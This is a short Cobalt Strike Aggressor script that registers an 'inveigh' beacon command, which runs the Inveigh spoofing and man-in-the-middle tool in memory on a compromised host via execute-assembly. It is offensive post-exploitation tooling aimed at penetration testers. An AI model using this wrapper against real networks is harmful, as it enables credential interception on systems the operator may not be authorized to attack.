beacon_command_register("inveigh", "Spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers",
	"Usage: inveigh [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias inveigh{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/cobalt_strike_extension_kit/exe/Inveigh.exe";
	$desc = "Inveigh";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}
